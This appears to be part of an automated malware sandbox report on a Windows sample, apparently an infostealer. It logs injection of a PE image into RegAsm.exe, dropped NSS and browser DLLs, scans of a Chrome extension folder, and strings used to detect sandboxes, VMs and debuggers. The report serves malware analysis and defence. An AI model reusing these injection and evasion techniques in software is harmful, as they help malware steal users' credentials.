                        Source: softokn3.dll.5.dr, softokn3[1].dll.5.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.dr
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: softokn3.dll.5.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.5.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.5.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.5.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.5.drStatic PE information: section name: .didat
                        Source: sqln[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.5.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.5.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C61CC push ecx; ret 0_2_003C61DF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004083A5 push ecx; ret 0_2_004083B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041A4E5 push ecx; ret 5_2_0041A4F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B536 push ecx; ret 5_2_6C82B549
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: file.exe, RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                        Source: file.exe, RegAsm.exeBinary or memory string: SBIEDLL.DLL
                        Source: file.exe, RegAsm.exeBinary or memory string: API_LOG.DLL
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h5_2_00410370
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D90D1 FindFirstFileExW,0_2_003D90D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,5_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,5_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,5_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,5_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410540 GetSystemInfo,wsprintfA,5_2_00410540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_5-59004
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_5-60085
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C67DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003C67DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004185A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DA24C mov eax, dword ptr fs:[00000030h]0_2_003DA24C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D0947 mov ecx, dword ptr fs:[00000030h]0_2_003D0947
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DC84B GetProcessHeap,0_2_003DC84B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C64D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003C64D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C67DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003C67DF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C693B SetUnhandledExceptionFilter,0_2_003C693B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CD209 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003CD209
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0041A68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041F768 SetUnhandledExceptionFilter,5_2_0041F768
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041BBB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C82B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C82B1F7

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042224D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_0042224D
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,5_2_00411BD0
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
